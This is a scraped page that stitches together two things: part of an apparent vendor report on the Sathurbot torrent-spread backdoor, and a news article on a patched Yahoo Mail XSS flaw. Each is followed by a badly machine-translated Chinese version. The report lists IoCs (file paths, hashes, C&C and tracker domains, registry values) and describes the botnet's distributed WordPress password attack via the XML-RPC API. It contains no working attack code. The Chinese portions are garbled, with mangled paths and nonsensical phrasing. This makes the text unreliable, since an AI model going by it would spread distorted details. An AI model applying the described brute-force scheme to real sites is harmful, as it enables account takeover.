Alternatively, consider a comprehensive anti-malware product, or at least an online scanner.

Prevention

Web Admins – Should the normal functioning of the website not require the XML-RPC API, you are advised to disable it and use complex passwords.

Users – Avoid both running executables downloaded from sources other than those of respected developers, and downloading files from sites not designed primarily as file-sharing sites.

IoCs

Currently, we have observed Sathurbot installing to:

\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll

\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll

\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll

\Users\*****\AppData\Local\Microsoft\Protect\protecthost.dll

Runs in the context of rundll32.exe or explorer.exe process and locks files and registry keys from editing. It is present in both x32 and x64 bit versions in the installer.

Subfolders to the above (contain the seeded files by torrent)
\SecurityCache\cache\resume\
\SecurityCache\cache\rules\
\SecurityCache\data\
\SecurityCache\zepplauncher.mif – contains the DHT nodes
\temp\

%appdata%\SYSHashTable\ – contains folders representing the hashes of visited domains
%appdata%\SYSHashTable\SyshashInfo.db – collection of interesting domains found incl. framework info

Samples (SHA-1)

Installers:
2D9AFB96EAFBCFCDD8E1CAFF492BFCF0488E6B8C
3D08D416284E9C9C4FF36F474C9D46F3601652D5
512789C90D76785C061A88A0B92F5F5778E80BAA
735C8A382400C985B85D27C67369EF4E7ED30135
798755794D124D00EAB65653442957614400D71D
4F52A4A5BA897F055393174B3DFCA1D022416B88
8EDFE9667ECFE469BF88A5A5EBBB9A75334A48B9
5B45731C6BBA7359770D99124183E8D80548B64F
C0F8C75110123BEE7DB5CA3503C3F5A50A1A055E
C8A514B0309BCDE73F7E28EB72EB6CB3ABE24FDD
AF1AE760F055120CA658D20A21E4B14244BC047D
A1C515B965FB0DED176A0F38C811E6423D9FFD86
B9067085701B206D2AC180E82D5BC68EDD584A8B
77625ADEA198F6756E5D7C613811A5864E9874EA
Sathurbot dll:
F3A265D4209F3E7E6013CA4524E02D19AAC951D9
0EA717E23D70040011BD8BD0BF1FFAAF071DA22C
2381686708174BC5DE2F04704491B331EE9D630B
2B942C57CEE7E2E984EE10F4173F472DB6C15256
2F4FAA5CB5703004CA68865D8D5DACBA35402DE4
4EBC55FDFB4A1DD22E7D329E6EF8C7F27E650B34
0EF3ECD8597CE799715233C8BA52D677E98ABDFD
0307BBAC69C54488C124235449675A0F4B0CCEFA
149518FB8DE56A34B1CA2D66731126CF197958C3
3809C52343A8F3A3597898C9106BA72DB7F6A3CB
4A69B1B1191C9E4BC465F72D76FE45C77A5CB4B0
5CCDB41A34ADA906635CE2EE1AB4615A1AFCB2F2
6C03F7A9F826BB3A75C3946E3EF75BFC19E14683
8DA0DC48AFB8D2D1E9F485029D1800173774C837
AC7D8140A8527B8F7EE6788C128AFF4CA92E82C2
E1286F8AE85EB8BD1B6BE4684E3C9E4B88D300DB

Additional payloads:

C439FC24CAFA3C8008FC01B6F4C39F6010CE32B6
ABA9578AB2588758AD34C3955C06CD2765BFDF68
DFB48B12823E23C52DAE03EE4F7B9B5C9E9FDF92
FAFF56D95F06FE4DA8ED433985FA2E91B94EE9AD
B728EB975CF7FDD484FCBCFFE1D75E4F668F842F
59189ABE0C6C73B66944795A2EF5A2884715772E
C6BDB2DC6A48136E208279587EFA6A9DD70A3FAA
BEAA3159DBE46172FC79E8732C00F286B120E720
5ED0DF92174B62002E6203801A58FE665EF17B76
70DFABA5F98B5EBC471896B792BBEF4DB4B07C53
10F92B962D76E938C154DC7CBD7DEFE97498AB1E
426F9542D0DDA1C0FF8D2F4CB0D74A1594967636
AA2176834BA49B6A9901013645C84C64478AA931
1C274E18A8CAD814E0094C63405D461E815D736A
61384C0F690036E808F5988B5F06FD2D07A87454
F32D42EF1E5ED221D478CFAA1A76BB2E9E93A0C1
594E098E9787EB8B7C13243D0EDF6812F34D0FBA
1AAFEBAA11424B65ED48C68CDEED88F34136B8DC
BA4F20D1C821B81BC324416324BA7605953D0605
E08C36B122C5E8E561A4DE733EBB8F6AE3172BF0
7748115AF04F9FD477041CB40B4C5048464CE43E
3065C1098B5C3FC15C783CDDE38A14DFA2E005E4
FA25E212F77A06C0B7A62C6B7C86643660B24DDA
FADADFFA8F5351794BC5DCABE301157A4A2EBBCF
B0692A03D79CD2EA7622D3A784A1711ADAABEE8D
9411991DCF1B4ED9002D9381083DE714866AEA00

Associated domains

DNS:
zeusgreekmaster.xyz
apollogreekmaster.xyz

C&C:
jhkabmasdjm2asdu7gjaysgddasd.xyz
boomboomboomway.xyz
mrslavelemmiwinkstwo.xyz
uromatalieslave.space
newforceddomainisherenow.club
justanotherforcedomain.xyz
artemisoslave.xyz
asxdq2saxadsdawdq2sasaddfsdfsf4ssfuckk.xyz
kjaskdhkaudhsnkq3uhaksjndkud3asds.xyz
badaboommail.xyz

Torrent trackers:
badaboomsharetracker.xyz
webdatasourcetraffic.xyz
sharetorrentsonlinetracker.xyz
webtrafficsuccess.xyz

Registry values

You may need to use a third-party tool, as Windows Regedit might not even show these:

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\explorer.exe|Name=Windows Explorer|”

HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\system32\\rundll32.exe|Name=Windows host process (Rundll32)|”

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0TheftProtectionDll = {GUID1}
HKLM\SOFTWARE\Classes\CLSID\{GUID1} = “Windows Theft Protection”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32 = “C:\\ProgramData\\Microsoft\\Performance\\TheftProtection\\TheftProtection.dll”
HKLM\SOFTWARE\Classes\CLSID\{GUID1}\InprocServer32\ThreadingModel = “Apartment”

HKLM\SOFTWARE\Classes\CLSID\{GUID2}

The {GUID2} entries are variable across samples and have 6 char long subkeys, content is binary type and encrypted – used to store variables, temporary values and settings, IP’s, C&C’s, UID

e.g. {GUID2} entries look like

HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000003
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000009
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000011
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010001
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00010002
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000008
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000007
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000004
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00000010
HKLM\SOFTWARE\Classes\CLSID\{8E577F7E-03C2-47D1-B4C0-BCE085F78F66}\00020001

BENWEN揭示了当前生态系统sathurbot后门木马,特别是在其使用的种子作为输送介质及其分布式蛮弱的WordPress的管理员帐户的强迫。HACKERSCHINA

torrent下载者

想不付钱就下载一部电影或软件?可能会有相关的风险。它很可能会发生,你最喜欢的搜索引擎返回到正常无关的文件共享网站Torrent链接。他们可以,但是,运行WordPress和已经被攻破。

一些搜索结果的例子:

点击那些链接返回以下页面(注意,有的甚至使用HTTPS):

这部电影的子页面都导致相同的torrent文件;而所有软件的子页面导致另一个torrent文件。当你开始在你的喜爱torrenting BT客户端,你会发现文件是好种子,从而出现合法。如果你下载电影的洪流,其内容将与视频延长伴有明显的编解码器包的安装程序文件,并解释文本文件。该软件包含了一个明显的安装程序可执行文件和洪流的一个小的文本文件。两者的目的都是让让受害者运行可执行文件加载DLL的sathurbot。

在你开始执行,你会有这样的消息:

当你思考你的选择,不好的事情开始发生在背景。你刚刚成为BOTsathurbot网络

后门和下载

在启动时,sathurbot检索与C的一个查询的DNS。该反应是一个DNS的TXT等记录。它的字符串值解密作为C &#38; C状态报告域名,任务检索到其他恶意软件下载链接。

sathurbot可以自我更新和下载和启动其他可执行文件。我们已经看到的变化boaxxeKovterfleercivet,但这不一定是一个详尽的列表。

的sathurbot然后报告其成功安装在一个监听端口的C&C的定期报告到C和C,它是活得很好,等待额外的任务。

网络爬虫

sathurbot附带一些5000再加上基本的通用词。这些都是随机组合形成2-4字词组合作为通过谷歌查询字符串,Bing搜索引擎Yandex。

从网页在每一个这样的搜索结果网址,随机2-4词长文本块选择(这次可能是更有意义的因为它是从真实文本)和用于搜索查询下一轮。

最后,搜索结果的第二集(第三页)收获的域名。

提取的域名都是随后探讨由WordPress框架创建。这里的诀窍是检查响应的URLhttp://〔〕/wp-login.php _名字域

随后该域的根目录页取了其他框架的存在。换句话说,他们也感兴趣:Drupal、Joomla,php-nuke,phpfox,和dedecms。

在启动时,或在一定的时间间隔,收获的域发送到C和C(一个不同的域是用比借壳–硬编码的一个)。

分布式的WordPress的密码攻击

客户现在可以得到一个列表域访问凭据(格式为登录名:密码@域)探讨密码。在Sathurbot的僵尸网络不同的机器人尝试不同的登录凭据相同的网站。每个机器人只尝试每网站和移动单点登录。这种设计有助于确保BOT没有IP地址被列入黑名单的任何目标网站,可以重温它的未来。

在我们的测试中,探讨10000项列表是由C和C返回

对于攻击本身的XML-RPC APIWordPress是使用。特别是wp.getusersblogsAPI的滥用。一个典型的请求看起来像:

探索一个数域凭据如下图所示的序列:

响应进行评估和结果发布到C和C

洪流客户端,播种机

BOT具有libtorrent图书馆集成和任务之一是成为一个播种机–二进制文件下载、创建和种子的种子。

BitTorrent的引导

完成周期从吸血一个非自愿的播种机

注:在网络不是每个BOT是执行所有的功能,有些只是网络爬虫,有的只是攻击XML-RPC API,有的做。而且,并不是每一个BOT似乎是播种的洪流。

影响

上述的尝试wp-login.php /从众多的用户,甚至网站不主机WordPress的,是sathurbot的直接影响。许多网站管理员观察和想知道为什么会发生。此外,WordPress网站可以看到潜在的攻击wp.getusersblogs在他们的日志

通过检查日志,系统构件和文件,僵尸网络由超过20000受感染的计算机,至少从六月2016活跃。

偶尔,我们看到Torrent链接通过电子邮件发送以及。

检测

网络管理员–检查服务器上的未知的子页面和/或目录。如果他们有任何引用洪流下载提供,检查和可能的后门攻击日志。

用户–运行Wireshark的滤波器http.request没有浏览器打开看到太多的要求,喜欢wp-login.php /和/或邮政/ xmlrpc.php。另外,检查文件或注册表项在国际奥委会部分上市,下面。

ESET用户免受这一威胁的多层次。

搬家公司

网络管理员–修改密码,删除不属于网站的子页面,随意擦拭,从备份中恢复的网站。

用户–使用第三方的文件管理器找到嫌犯。DLL(注意,文件和目录都有隐藏属性设置),打开进程管理器、任务管理器,杀死explorer.exe和/或rundll32.exe,删除(检疫)的影响。DLL,启动。

注意:这将删除sathurbot而已,并没有任何其他恶意软件可能还下载了。

另外,考虑全面的反恶意软件产品,或者至少是一个在线扫描

预防

网络管理员–应该正常运作的网站不需要XML-RPC API,建议您禁用它并使用复杂的密码。

用户–避免运行的可执行文件从其他来源比尊重开发者下载,并不是设计作为主要的文件共享网站的站点下载文件。

IOC

目前,我们已经观察到sathurbot安装:

programdata \ Microsoft \ \ \ \ performancemonitor.dll性能监视器

\下\微软\ \ \ theftprotection.dll theftprotection性能

\下\微软\ \ \ securityhelper.dll性能监控

\用户\ ***** \ AppData \地方\微软\保护\ protecthost.dll

运行中rundll32.exe或Explorer.exe进程锁和编辑文件和注册表键。它是在安装x32和x64位版本目前。

子文件夹,以上(含种子文件的洪流)
securitycache \ \ \ \缓存摘要
\ \ \ \ securitycache缓存规则
securitycache日期\ \ \
“securitycache \ zepplauncher.mif–包含DHT节点
\温度\

syshashtable %APPDATA%directory \ \–包含表示哈希文件夹访问域
syshashtable %APPDATA%directory \ \ syshashinfo.db–收集有趣的领域,包括框架的信息

Yahoo flaw, now fixed, allowed hackers to access any user’s email 雅虎最新xss漏洞 需要的请自行翻译一下吧。

Yahoo has fixed a critical cross-site scripting (XSS) vulnerability that could have been exploited by hackers to access any Yahoo Mail user’s private emails.

If left unpatched, the vulnerability could have potentially put an estimated 300 million Yahoo Mail accounts at risk.

The security flaw was found by Finnish vulnerability researcher Jouko Pynnönen, who works for the security company Klikki Oy. Pynnönen has a history of uncovering XSS vulnerabilities in web-facing software, having responsibly disclosed security holes in the likes of WordPress and Uber in the past.

The flaw, which was patched in late November after Pynnönen responsibly disclosed details to Yahoo’s security team, allowed malicious JavaScript to be embedded within a specially-formatted email message.

What should send a chill down the spine is that an attack exploiting the vulnerability would not require any user interaction. All a victim would have to do to have their account compromised is simply view an email, with no requirement to click on a link or open an attachment.

Yahoo XSS vulnerability

The malicious code embedded in the email could be used by an attacker to compromise an account, change its settings, forward messages to an external account, or even spread a Yahoo Mail-infecting virus.

For his efforts Pynnönen was rewarded with a $10,000 prize under Yahoo’s bug bounty program.

This isn’t the first time that Pynnönen has earned himself a handsome reward for reporting critical security vulnerabilities in Yahoo’s mail system. A year ago, Pynnönen told Yahoo about a different but similar stored XSS vulnerability that allowed attackers to embed malicious script inside boobytrapped email messages.

Just viewing the message was enough to trigger the malicious code – meaning that the recipient did not have to be tricked into clicking on any links or opening any attachments. The malicious script could be used to compromise the account – changing settings, or forwarding/sending emails without the user’s consent.

Pynnönen provided Yahoo’s security team with a proof-of-concept email that would forward a victim’s inbox to a third-party website, and a virus that would infect the account and attach itself to every subsequent email sent from the Yahoo Mail account.

It’s easy to imagine how such an attack could spread very quickly, and would be attractive for online criminals to exploit.

Fortunately, there were no known exploits in the wild, and the vulnerability was patched in January 2016.

It’s a shame that the work which Yahoo did then to fix that flaw didn’t also protect against the latest vulnerability. A stronger filter at Yahoo’s gateway, hunting for malicious HTML, could have stopped these types of attacks dead in their tracks.

Thank goodness that Pynnönen believes in responsibly disclosing details of his findings to technology companies, and that Yahoo responded appropriately in this latest case.

中国骇客云最新0dayxss漏洞之雅虎漏洞,现在固定,允许黑客访问任何用户的电子邮件

雅虎已经固定的一个关键的跨站点脚本(XSS)漏洞可能被黑客利用来访问任何雅虎邮箱用户的私人邮件。

如果不打补丁,该漏洞可能让估计3亿雅虎邮件账户的风险。

该安全漏洞是建立由芬兰漏洞研究员Jouko Pynnö嫩,为安全公司klikki公司工作的人。pynnö嫩有揭露网络面向软件XSS漏洞的历史,在喜欢有负责任披露的安全漏洞WordPress和优步在过去的

这是修补缺陷,在十一月下旬Pynnö嫩的负责任的披露的细节,雅虎的安全团队,允许恶意的JavaScript被嵌入到一个特殊格式的电子邮件。

要发送一个冷下来的脊柱是一个攻击利用该漏洞不需要任何用户交互。所有的受害者都要有自己的帐户妥协仅仅是查看邮件,无需点击链接或打开附件。

Yahoo XSS vulnerability

恶意代码嵌入在电子邮件可能会被攻击者用来折中考虑,改变其设置,邮件转发到外部账户,甚至传播雅虎邮件的感染病毒。

他的努力pynnö嫩获得了10000美元的奖金的雅虎的错误赏金计划下。

这不是Pynnö嫩自己挣来的报告在雅虎的邮件系统中关键的安全漏洞,一个英俊的奖励第一时间。一年前,pynnö嫩告诉雅虎关于不同但类似的存储型XSS漏洞允许攻击者将恶意脚本里面boobytrapped电子邮件。

只是看消息足以触发恶意代码–意味者没有被诱骗点击任何链接或打开任何附件。恶意脚本可以用来妥协的帐户–改变设置,或转发或发送电子邮件,在用户不知情的情况下。

pynnö嫩有概念的电子邮件,将受害者的邮箱一个第三方网站证明雅虎的安全团队,和一个病毒,会感染的账户和依附以后每封电子邮件从雅虎邮件帐户发送。

不难想象,这样的攻击可能会蔓延得很快,会吸引网络罪犯利用。

幸运的是,有没有已知的漏洞在野外,和脆弱性修补2016年一月

这是雅虎当时修理缺陷也没有抵御最新的漏洞,工作的耻辱。一个强大的过滤器在雅虎的网关,恶意HTML狩猎,可以阻止这些类型的攻击在其轨道上死了。

谢天谢地,pynnö嫩相信负责任的披露他的发现细节的技术公司,而雅虎的这一最新情况作出适当的反应。